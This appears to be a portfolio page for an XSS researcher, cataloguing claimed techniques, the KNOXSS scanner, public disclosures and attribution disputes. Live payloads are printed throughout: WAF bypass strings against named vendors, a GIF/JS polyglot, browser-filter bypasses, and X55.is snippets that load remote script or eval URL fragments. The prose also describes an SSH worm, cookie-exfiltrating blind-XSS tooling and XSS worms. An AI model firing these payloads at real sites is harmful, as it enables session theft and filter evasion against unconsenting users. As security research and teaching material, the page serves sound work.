A self-replicating SSH worm in 140 characters, written for a Twitter challenge. Explains credential-based lateral movement via sshpass + SCP loop targeting random IPv4 space. Published on WordPress.com (brutelogic.wordpress.com) before the main blog launched.
Original Contributions
Techniques, taxonomies, and tools originating in this research. Entries marked (X) were first published as tweets rather than blog posts.
A single idea connects much of this work: the relationship between multiple points, contexts, or constraints is itself the attack surface. Where most researchers see one injection point and ask what payload fits it, this research asked what happens when one input lands in two places, or one payload must satisfy two different parsers simultaneously. Multi-reflection XSS — using two or more reflection points of the same input cooperatively to bypass filters that would block any single-point attack — has no prior formulation in the public record. Quoteless injection in JS contexts exploits the same structural insight: two in-page reflection points on the same line, one backslash, the parser's own delimiter used against the filter. Transcending context-based filters uses <svg>/<math> plus HTML comments to span parser boundaries that individually correct filters cannot see across. Polyglot payloads — one payload that fires across multiple execution contexts — were already a known concept in the field; the contributions here are a superior XSS polyglot, and the first systematic extension of the polyglot model across vulnerability classes: XSS, SQLi, and SSRF/LFD. Input validation bypass for SSRF applies the same cross-constraint methodology to URL parsing. These are all expressions of the same root: using multiplicity as the exploit primitive. The taxonomic work (7 Main XSS Cases, agnostic event handlers, the 3 Sinks framework — Document, Location, Execution) follows a different but related impulse: naming what the field was doing implicitly, so it could be taught and built upon.
-
Agnostic event handlers — term coined, complete catalog of JavaScript event handlers that execute on any HTML or XML tag, across all major browsers. The
<brute>arbitrary tag introduced as the canonical demonstration element. -
XSS payload structural scheme — the
<TAG/ATTRIBUTE=VALUE/EVENT=JSEXPRESSION>model for payload construction, used implicitly throughout the field. -
Source-breaking injections — technique of leaving an HTML attribute value open to consume all intervening source code, neutralizing JavaScript-based DOM filters while preserving a path to execution via
onafterscriptexecute/onbeforescriptexecute. -
Multi-reflection XSS — first systematic treatment of multiple reflection points as an exploitation technique: using two or more reflections of the same input cooperatively so that each fragment is individually harmless but the combined parse produces execution. The payload is engineered across the page's own structure — the first reflection opens a tag or attribute that the second closes, the page's native HTML providing the connective tissue. This is distinct from HTTP Parameter Pollution (which concerns how servers merge duplicate parameters) and from polyglot payloads (which concern a single payload surviving multiple syntax environments). The attack surface here is the relationship between reflection points, not the payload itself. Covers: tag-based multi-reflection using
<svg/1='and'onload=alert(1)>across two occurrences; script-context multi-reflection using JS comment bridging; the two-input variant where different parameters land in different page contexts; and the backslash-escaping-the-escape technique for double-reflected JS string injections. -
Transcending context-based filters — using
<svg>or<math>combined with HTML comments to span multiple injection contexts in the same document, defeating filters that are individually correct but fail to compose. The key insight: an<svg>tag changes how the HTML5 parser treats the content of the next<script>block — characters encoded as HTML entities are decoded inside script context under SVG, breaking the assumption that each filter's scope is independent. No prior public formulation found. - Self-XSS + CSRF escalation — procedure for weaponizing self-XSS via logout CSRF + login with attacker-controlled credentials, placing the victim in a context where the self-XSS fires against them.
-
Self-Replicating XSS (X) — a form payload that assigns its own
outerHTMLto a hidden input and self-submits on click:<form method=post onclick=elements[0].value=outerHTML;submit()><input name=NAME>click!</form>. No corresponding blog post; first published on X/Twitter. -
GIF polyglot for file upload XSS —
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;— a file simultaneously valid as a GIF image and executable as JavaScript/HTML when served with a permissive MIME type. Verified against PHP'sexif_imagetype(),getimagesize(), and the Unixfilecommand. The contribution is the extension of the polyglot model to cross file format boundaries — satisfying both a binary image format validator and an HTML/JS parser with the same byte sequence — as a practical file upload bypass technique. -
Chrome XSS Auditor bypasses — documented series starting with
<script src=data:%26comma;alert(1)->and a full table of payloads indexed by the character immediately following the injection point. - XSS from RCE (supply-chain XSS) — first published treatment of compromising a CDN-hosted third-party script to achieve stored XSS across all consuming sites as an explicit attack model.
- Blind XSS callback tool — complete PHP implementation: single file serves as the injected script source and the POST receiver, exfiltrating IP, user agent, cookies, sessionStorage, localStorage, and full DOM by email. Predates commercial blind XSS platforms.
-
XSSaminer — bash/grep static analysis tool for PHP; documented all
$_SERVERvariables carrying user-controlled input including the URL-decoding caveat ofREQUEST_URI. Used to find a 0-day in a WordPress theme. - XSS worm construction methodology (three-part series) — complete buildable tutorial for self-propagating XSS worms in the HTML5 era: infection, propagation via XHR with CSRF token extraction, and persistence.
-
Self-referencing iframe bypass for
javascript:— whenjavascript:is blocked in all forms, load the same vulnerable page in an<iframe src=?p=...>with a double-URL-encoded second-order payload, bypassing both the filter andX-Frame-Options: SAMEORIGIN. -
XSS → RCE PoCs for WordPress, Joomla!, Drupal — working JavaScript exploits for all three CMSes using CSRF token extraction, including the
.php5extension bypass for Drupal's PHP execution restriction. - The 7 Main XSS Cases — named taxonomy of seven source-based injection contexts with canonical payload for each. Now reproduced in penetration testing curricula, CTF training, and security certifications globally.
-
Chrome XSS Auditor SVG bypass via
<animate>—<animate attributeName=href values=javascript:alert(1)>inside a parent<a>element evades Auditor's static pattern matching by mutating the href attribute at animation runtime. Worked Chrome v51–v60. -
DOM-based XSS: The 3 Sinks framework — taxonomy of the three DOM sink categories, each requiring a different payload structure: Document Sink (
innerHTML,outerHTML,document.write,document.writeln— attacker-controlled input updates the document, enabling tag injection); Location Sink (document.location— attacker-controlled input updates the browser's location, enabling thejavascript:pseudo-protocol); Execution Sink (eval,setInterval,setTimeout, template literals — attacker-controlled input enters the JS execution flow directly). Named and published here; became standard pedagogical structure for DOM XSS. -
Quoteless injection methodology — injection without quotes, covering JS and SQL contexts, both dependent on the multi-point structure. JS: when the same input lands in two or more reflection points on the same line, a backslash in the first point escapes the closing quote of that variable, causing the JS parser to treat the opening delimiter of the next variable as the string boundary — giving full control of the intervening code without ever using a quote character. The attack requires two reflection points; it is structurally the same multi-point insight as multi-reflection XSS applied to JS parser behavior. Canonical payload:
'-alert(1)//\. Also covers the backtick/template literal variant: input in a`backtick`-delimited variable allows${alert(1)}as a quoteless execution vector, or the same backslash trick across multiple lines. SQL: backslash-based escaping to break quote-delimited strings across multi-reflection login form scenarios. First published as SQLi Without Quotes at eternalnoobs.com (author's own domain), 2018-08-20. Expanded on the main blog 2018-09-17. Later renamed "Fragmented SQL Injection" by Invicti (Nov 2018) and referenced by Intigriti without credit to original author, name, or date. -
Six-payload XSS list for manual testing (X) — tweet presenting the main cases with high success rate:
"><img src onerror=alert(1)>,"autofocus onfocus=alert(1)//,</script><script>alert(1)</script>,'-alert(1)-',\'-alert(1)//,javascript:alert(1). 2,882 favorites · 1,011 retweets. -
Byte Fallback (X) — in Java portlet environments, a non-valid byte embedded in a percent-encoded sequence is silently dropped to zero by the parser, allowing WAF-bypassing payloads of the form
<Svg%K9OnLoad=%7Krompt%6K1%6K>. Named and described on X/Twitter; no blog post. - SSRF via polyglot payloads / input validation bypass — first systematic extension of the cross-constraint polyglot model to SSRF and LFD: crafting URLs that simultaneously satisfy allowlist validation and input format checks while triggering server-side requests to attacker-controlled infrastructure. Where the field treated SSRF as a URL parsing problem, this work framed it as a constraint-satisfaction problem — the same structural approach as XSS polyglots and SQLi quoteless injection, applied across a different vulnerability class. Published: On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found — Part I, Medium, 2021-07-20.
- XSS with hoisting — systematic treatment of JavaScript variable and function hoisting as a distinct XSS vector category, first named and published here.
-
PyScript XSS vector (X) — XSS execution via the
<py-script>custom element:<py-script>print('\74img/src/onerror\75alert(1)\76')</py-script>. First published treatment of the PyScript runtime as an XSS vector. No blog post. - Tag blending obfuscation — defeating WAF pattern matching by choosing tag + attribute name combinations that fall outside the filter's vocabulary as complete strings.
Research Timeline
2014
Before the Blog
2015
Foundations — Vocabulary and Methodology
Coined the term and provided the first complete catalog of event handlers that execute on any HTML or XML tag regardless of context. Introduced <brute> as the canonical arbitrary tag for XSS demonstrations.
Defined the structural model for XSS payload construction: <TAG/ATTRIBUTE=VALUE/EVENT=JSEXPRESSION>. The implicit framework for all subsequent payload work.
Using JavaScript already present on the page to execute payloads, reducing filter footprint.
Systematic methodology: enumerate what is blocked, identify what passes, combine passing elements into valid vectors. Established the procedural approach to filter analysis that runs through the entire body of work.
Discovery methodology: how to identify XSS reflection points, distinguish injection contexts, and confirm exploitability.
Four-part series (Dec 2015 – Jan 2016) on using document.location properties as payload delivery mechanisms: keeping attack code out of server-visible URL parameters via location.hash, base64 encoding via atob(), and the .source RegExp trick for quote-free strings.
Jan–Feb 2016
Structural Techniques
Original technique: an open attribute value consumes all subsequent HTML into its value, disabling intervening JavaScript filters. Used with onbeforescriptexecute to reach execution beyond the broken section.
Complete two-piece technique: a single <svg onload=setInterval(...)> payload plus a netcat shell loop creates an interactive JavaScript REPL over HTTP, requiring no external framework.
Systematic exploitation of two or three reflection points with a single payload. Includes double-context (HTML + script), triple reflection with backtick delimiters, multi-input constructions, and the backslash-escapes-the-escape technique for JS string injections.
Mar 2016
Context Transcendence and Cross-Origin
Complete catalog of XSS vectors requiring no event handler: javascript: pseudo-protocol in src, href, action, formaction, data, srcdoc, xlink:href, and <animate from=> attributes.
Original technique: <math><!-- or <svg><!-- placed in one context consumes intervening HTML and allows the second injection point to merge contexts. Demonstrated against a page with three individually correct filters that failed to compose.
window.postMessage origin-check bypass via indexOf weakness. Published CrossPwn PHP tool automating onmessage, onresize, and onhashchange cross-origin XSS. Introduced eval(name) for hiding payloads from server logs.
Mobile-specific XSS vectors: touch events, onorientationchange. Navigator API exploitation for geolocation, battery level, connection type. Camera capture via webkitGetUserMedia. navigator.vibrate() as a physical PoC.
Apr–May 2016
Attack Chains and Tooling
Three escalation methods; the CSRF logout+login procedure to place a victim in the attacker-controlled session context is the original contribution.
Four attack surfaces: filename, EXIF metadata, SVG content, and the GIF polyglot (GIF89a/*<svg/onload=alert(1)>*/=alert(domain)//;) — simultaneously valid as GIF and executable as HTML/JS.
Systematic bypass table for Chrome's XSS Auditor (v50) covering five post-injection character types, with payloads using the data URI comma-encoding technique.
Bidirectional analysis: XSS→RCE (via admin CSRF + webshell) and RCE→XSS (CDN compromise as supply-chain attack). First explicit treatment of supply-chain XSS via third-party script compromise.
Complete PHP blind XSS callback tool: one file, dual role as script source and POST receiver, exfiltrating full DOM + all client storage to attacker's email. Predates commercial blind XSS platforms.
Released XSSaminer (bash/grep static analysis). Full documentation of PHP $_SERVER XSS sources including the REQUEST_URI URL-decode caveat. Found a 0-day in a WordPress theme during demonstration.
Jun–Oct 2016
Worms, Chains, and Advanced Exploitation
<base injection (5 characters) to hijack all relative URL resolution site-wide, enabling full script execution without touching a script tag.
Three-part series (Jun–Jul 2016): complete buildable tutorial for self-propagating XSS worms in HTML5 — infection vector, CSRF token extraction, worm payload replication, async XHR chains, persistence. No prior equivalent in public literature.
Named taxonomy of XSS consequences: session hijacking, credential theft, defacement, browser exploitation. Used in subsequent security training contexts.
2017
Education, CMS Exploitation, and SVG Research
Working XSS → RCE PoCs for WordPress 4.7.5, Joomla! 3.7.2, and Drupal 8.3.2. The Drupal .php5 extension bypass for the CMS's PHP execution restriction is original.
Comprehensive reference: XSS definition, types, all basic PoC vectors, full attacker capability taxonomy. The most complete introductory treatment published by the author.
Named taxonomy of seven injection contexts with canonical payloads. Reproduced globally in security curricula, CTF training, and penetration testing documentation — the most widely cited post in the corpus.
<animate attributeName=href values=javascript:alert(1)> inside a parent anchor mutates the href at animation runtime, evading Auditor's static pattern matching. Worked Chrome v51–v60.
2018–2019
DOM XSS, Injection Depth, and Methodology
The three-sink framework for DOM-based XSS: Document Sink (innerHTML, outerHTML, document.write, document.writeln), Location Sink (document.location, enabling the javascript: pseudo-protocol), and Execution Sink (eval, setInterval, setTimeout, template literals). Each requires a different payload structure. Became a standard pedagogical structure for DOM XSS.
The most complete published description of a professional XSS testing workflow: parameter enumeration, context mapping, payload selection, execution confirmation.
2020–2024
Advanced Bypass, Polyglots, Modern Techniques
From-scratch polyglot construction. Core: <K/contentEditable/autoFocus/OnFocus=(alert)(1)> where K is the KNOXSS tag. Extended to cover tag breakout, string delimiter breakout, and JS comment structure for multi-context coverage.
JavaScript variable and function hoisting as a named XSS vector category, first published here.
Defeating WAF pattern matching by choosing tag + attribute combinations that fall outside filter vocabulary as complete strings.
XSS within whitelist-based attribute filtering: finding execution through constrained allowed-attribute contexts.
KNOXSS
Automated XSS detection service at knoxss.pro. In continuous operation since December 2016.
KNOXSS covers the full XSS attack surface — not just the basics every scanner handles. Beyond standard reflected HTML and JS injection across query parameters and path-based URLs (up to 3 levels deep), it detects:
- Multi-reflection — single payload spanning multiple reflection points, including quoteless injection in JS objects, nested arrays, and nested functions
- Hybrid XSS — the overlooked category where data arrives from the server (source-based, like reflected) but execution happens via DOM manipulation rather than direct rendering. A JS variable assignment is the canonical example: the value is in the source, but nothing fires until the DOM engine processes it. KNOXSS handles this correctly where most tools miscategorize or miss it entirely — including hoisting-based payload variants derived directly from the author's own published research
- DOM-based XSS — 7 cases including AngularJS and Bootstrap library-specific vectors
- CSP bypass — 5 cases including JSONP via whitelisted googleapis endpoints and base URI injection against nonce-based scripts
- Edge cases most tools never attempt — strict-length inputs (32, 40, 64 chars), base64-encoded parameters, parameter name injection, spell-checking bypass, CRLF header injection, byte fallback for Java WAF evasion, double encoding, email filter bypass, server-side and client-side parameter guessing
- Blind XSS with email notification
- Stored XSS via cached header reflection (Varnish)
- Authenticated XSS via cookie-based sessions
- SSRF-based XSS via remote file inclusion
- Open redirect detection — client and server side, filtered and unfiltered variants
The coverage list is not exhaustive. Full test case matrix at knoxss.pro/?page_id=766.
Community use: bug bounty hunter Sadiq West documented finding an XSS on Edmodo within five minutes using the free KNOXSS demo (2018).
Timeline
- 2016 Origins — KNOXSS grew out of pmap and BruteX, earlier command-line tools built by the same author for reconnaissance and brute-force tasks. The XSS detection logic was extracted and developed into a dedicated service.
- Public teaser — first public announcement of KNOXSS.
- Official launch — knoxss.me goes public. Browser extension shipped at launch (beta). @knoxss_me X/Twitter account created same day.
- Blind XSS — blind XSS detection with email notification added.
- v2.0 — major version release.
- Community Edition — free tier introduced, making KNOXSS accessible to the broader bug bounty community.
- Handle change — @knoxss_me renamed to @KN0X55.
- v4 series — launched with v4.0.0. New features: Cached Scans, Runtime Log, and User Feedback for false negatives. Announced via @KN0X55.
Notable Disclosures
Selected individual vulnerability disclosures outside the Open Bug Bounty period. Dates reflect first report or public disclosure.
-
NASA JPL (aviris.jpl.nasa.gov — Jet Propulsion Laboratory, AVIRIS Flight Line Locator) — XSS via DOM-based injection. Full public disclosure via X/Twitter, tagged #XSS #NASA. Alert box displays
NASA_xss. - Amazon — XSS on amazon.com discovered March 21 and reported directly to XSSposed.org without notifying Amazon, citing the absence of a cash bug bounty program. Amazon patched two days later. The vulnerability allowed viewing of user credit card data and purchases in victims' names. Covered by The Register and BetaNews.
- Groupon — 32 XSS vulnerabilities reported, all at the root domain and easily exploitable via crafted URL. Groupon refused to pay the bounty, citing a brief XSSposed.org publication as a responsible disclosure violation. Story covered by BetaNews and BGR. Resolved: Groupon eventually paid; confirmed via tweet July 27, 2015.
- Oracle — XSS reported; patch issued; patch bypass subsequently shared publicly.
- Baidu — XSS reported and disclosed.
- US Senate (senate.gov) — XSS via Akamai Kona WAF bypass; angle brackets stripped, bypass demonstrated.
-
LinkedIn — XSS reported; bounty denied. Filter blocked
<script>but vector was exploitable. Disclosed publicly after rejection. -
NASA (science.gsfc.nasa.gov — Goddard Space Flight Center) — XSS via SVG-based bypass of a
<script>-only filter. Full public disclosure posted directly to X/Twitter with working PoC URL, tagging @NASA. No coordinated disclosure period. - Microsoft — MSRC Security Researcher Acknowledgments for Online Services, December 2015 — credited as "Brute Logic / Sucuri Security" for XSS contribution to a Microsoft online product. Collaboration with @strukt93. Announced on X/Twitter Jan 21, 2016.
-
United Airlines — XSS on checkin.united.com via the SID parameter. United's client-side JS filter (XSSObject proxy) blacklisted alert/confirm/prompt/write but omitted
writeln. Collaboration with @strukt93 (Mustafa Hasan), who identified the initial bypass failure; @brutelogic supplied the key insight and final payload:document.writeln(decodeURI(location.hash))combined with an IFrame to load a fresh HTML document outside the filter's scope. Documented in @strukt93's blog post and @brutelogic's post on bypassing JS overrides. Featured in Web Hacking 101 by Peter Yaworski (pp. 51–55), which credits @brutelogic by name and recommends his XSS cheat sheet. - WordPress — CVE-2017-14726 — XSS in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security. Fixed in WordPress 4.8.2. Explicit named attribution in the official WordPress security release. The only CVE credited to @brutelogic.
- Bitrix24 — CVE-2020-13483 — WAF/RASP bypass via JS hoisting. Tweeted with a short proof-of-concept payload demonstrating the bypass technique; the full methodology was documented the following day in the blog post "XSS With Hoisting."
- Apple — Apple Web Server Security Acknowledgments, December 2025 — credited as "Tirtha Mandal, Rodolfo Assis" for responsible disclosure of a web server security vulnerability.
Conference Appearances
- BSides Boston 2016 — XSS and WAF bypass talk. Slides published 2016-05-23.
- DEF CON 24 (Las Vegas) — Attendance; no talk.
- DEF CON 25 (Las Vegas) — Talk at 14:40, Caesar's Palace, Packet Hacking Village / Wall of Sheep.
- Ekoparty 2025 (Buenos Aires) — BypaXSS: The Brute Art of Bypass — XSS filter and WAF bypass techniques — the same subject covered in the ebook The Brute Art of Bypass.
WAF Bypasses
Published bypasses against named commercial WAF vendors. All entries marked (X) were first published as tweets. Dates reflect first public disclosure of the bypass.
- Gartner Magic XSS (X) — tweet.
- Wordfence bypass (X) — tweet.
-
Cloudflare bypass (X) —
<Svg Only=1 OnLoad=confirm(1)>— tweet. -
Imperva bypass via
onbegin(X) — tweet. - Akamai bypass via inline HTMLi + optional chaining (X) — tweet.
-
Cloudflare bypass (X) —
<Img Src=OnXSS OnError=confirm(1)>— tweet. -
Akamai bypass via
%252Fdouble-encoded slash (X) — tweet. - Akamai + Imperva + Cloudflare — single payload bypassing all three simultaneously (X) — tweet.
-
Imperva + Akamai + Cloudflare — another single payload bypassing all three simultaneously, prepend 50 chars:
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>— uses double-encoded"and form feed%0C— (X) — tweet. 295 likes · 48 retweets · 49K impressions.
Open Bug Bounty — 2015
From January 23 to May 29, 2015, Brute Logic submitted 1,337 XSS vulnerability reports through Open Bug Bounty, ranking #1 globally. All 1,337 reports are present on OBB; Cloudflare prevents automated archiving but the full record is publicly accessible. A sample of notable targets from the recovered set:
| Date | Target | |
|---|---|---|
| 2015-01-23 | espn.go.com | report |
| 2015-01-24 | thomas.loc.gov (Library of Congress) | report |
| 2015-01-24 | scholastic.com | report |
| 2015-01-26 | nbcnews.com | report |
| 2015-01-26 | edmunds.com | report |
| 2015-01-27 | thesaurus.com / reference.com | report |
| 2015-01-28 | bl.uk (British Library) | report |
| 2015-04-01 | oracle.com | report |
| 2015-04-03 | homedepot.com | report |
| 2015-04-14 | ~50 U.S. regional newspaper sites (GateHouse / Lee Enterprises shared CMS — same day) | |
| 2015-04-23 | groupon.com | report |
| 2015-04-24 | baidu.com + baidu.cn | report |
| 2015-04-30 | senate.gov | report |
| 2015-05-07 | linkedin.com | report |
| 2015-05-08 | accessdata.fda.gov | report |
| 2015-05-08 | discovery.nationalarchives.gov.uk | report |
| 2015-05-25 | revisor.mn.gov | report |
| 2015-05-25 | bbb.org (Better Business Bureau) | report |
| 2015-05-28 | darkreading.com + informationweek.com + networkcomputing.com + banktech.com + lightreading.com + wallstreetandtech.com (full UBM Tech network — same day) | report |
| 2015-06-10 | business.usa.gov | report |
Full profile: openbugbounty.org/researchers/Brute/
X55.is — Universal XSS Delivery Domain
Purpose-built domain for XSS research and testing. Testing pages from brutelogic.com.br were migrated here. Every URL path — including the root — responds with valid JavaScript that pops an alert. No path configuration. Also used as Blind XSS delivery infrastructure by KNOXSS.
/* X55 is... Cross-Site Scripting! */
/* Any path. Any subdomain. Always JS. Copyright 2026 Brute Logic */
// Root: x55.is/
<Img Src OnError = h=location.hash,h?eval(h.slice(1)):confirm(1)>
// Any other path: x55.is/anything
if (location.hash) { eval(fragment); }
else if (base[0].id) { import('https://X55.is?1=' + id); }
else { alert(1); }
Any Path → Alert
Every URL path returns JS that pops an alert. Use anywhere a remote script source is needed — no filename required.
<script src=//X55.is/any/path></script>
Base Href Injection
Setting <base href=//X55.is> makes all relative imports load from X55.is. Any import() or relative script becomes a remote call.
<Base Href=//X55.is>
Image + Script Dual-Role
X55.is acts as both image source (satisfies src validation) and JS execution via onload + import(). One domain, two attack roles.
<Img Src=//X55.is OnLoad=import(sec)>
Wildcard Subdomain Bypass
All subdomains respond identically. Regex filters anchored to domain.tld are bypassed: target.com.X55.is contains the expected string as a substring.
target.com.X55.is // passes /target\.com/
URL Fragment Execution
If the URL has a # fragment, X55.is evaluates it as JS. Code never reaches the server — useful where URL params are logged but fragments are not.
https://X55.is#alert(document.domain)
Blind XSS Integration
Integrates with KNOXSS for Blind XSS. Injected callbacks route via x55.is/blind/ to KNOXSS tracking and notification infrastructure.
x55.is/blind/ → knoxss.pro
Testing resources at x55.is/brutelogic/ — XSS GYM (gym.php), DOM tests (dom/), multi-reflection (multi/), CSP (csp/), session (session/), spell-checker (spell/), path-based (path/), lab (lab/).
Published Ebooks
First Bounty: A Bug Hunter's Guide to Easy Wins
Systematic methodology for finding the first bug bounty: the "Big Three" vulnerability types achievable without advanced skills, 6–8 month timeline, ready-to-use automation scripts.
The Brute Art of Bypass — Unfiltered Edition
XSS filter evasion methodology — the thinking process for finding bypasses when known payloads fail. 15 years of WAF bypass research distilled into systematic frameworks. Not a payload list.
SSRF Mastery Series: Fundamentals
Systematic SSRF exploitation: discovery, URL parser bypass, blind SSRF chains, cloud metadata, and the polyglot-payload approach to input validation bypass. Book 1 of a series.
Recurring Themes
The filter is never the last word
Every filter across nine years of posts is treated as an obstacle to understand and bypass, not an endpoint. The methodology: understand the model, find the gap between model and parsing reality, build the minimal payload that exploits that gap.
The browser is the attack surface
XSS is framed as browser control throughout — what can be done to and through the browser once code executes. Mobile devices, geolocation, camera access, vibration, and interactive browser control via netcat all follow from this framing.
Minimum characters, maximum effect
Payload minimization is a recurring concern: shortest reflected XSS, quoteless injections, payloads for length-limited inputs. This reflects real deployment constraints, not academic compression.
The exploitation chain
Many posts follow the chain beyond the PoC: XSS → session theft → admin access → CSRF → RCE. XSS is treated as a step in an attack chain, not a terminal finding.
Cross-context interaction
A specific and sustained research interest: what happens at the boundary between HTML, JavaScript, and CSS parsers. Multiple posts target the seams where individually correct filters fail to compose.
Pedagogy as research record
Every post is both a research finding and a teaching document. The #hack2learn tag on most posts is not decoration — it reflects the author's consistent framing that understanding and exploitation are the same activity.
Attribution
The following cases document where techniques originating in this body of work appear in circulation without attribution to the source.
The 7 Main XSS Cases
Published: brutelogic.com.br/blog/the-7-main-xss-cases-everyone-should-know/, . The canonical payloads from that post — '-alert(1)-', \'-alert(1)//, "><svg onload=alert(1)>, </script><svg onload=alert(1)> — appear verbatim at: PortSwigger Web Security Academy, OWASP XSS testing guides, HackTricks, PayloadsAllTheThings. None of those sources cite the 2017-07-10 origin.
Quoteless Injection
First published: SQLi Without Quotes, eternalnoobs.com (author's own domain), . Expanded at brutelogic.com.br/blog/quoteless-javascript-injections/, . In November 2018, Invicti published "Fragmented SQL Injection Attacks" covering the same technique; neither original publication is cited. The technique has since appeared under the Invicti terminology at Intigriti and elsewhere. Original name: quoteless injection. Original author: Brute Logic (@brutelogic). Original date: 2018-08-20.
The <brute> tag
All demonstration payloads in this body of work use <brute> as the canonical arbitrary HTML tag. The tag appears throughout industry cheat sheets, training materials, and tooling. It is copied without the author's name it encodes.
KNOXSS
Operational since December 2016. The most detailed public documentation was produced by Emad Shanab (@Alra3ees): "KNOXSS for Dummies" (January 2018) and "KNOXSS The WAFs Slayer" (December 2018). Current address: knoxss.pro.
Structural factors
The author publishes under a handle rather than a legal name. The primary domain is .com.br, which aggregators structurally deprioritize. By the time techniques were widely cited, the accessible explanation was typically a secondary source with no backlink. The blog was indexed into AI training corpora before attribution conventions applied to that data.
Primary source: brutelogic.com.br/blog, through , 56 blog + 4 Medium + 1 WordPress = 61 total. Author: Brute Logic, @brutelogic.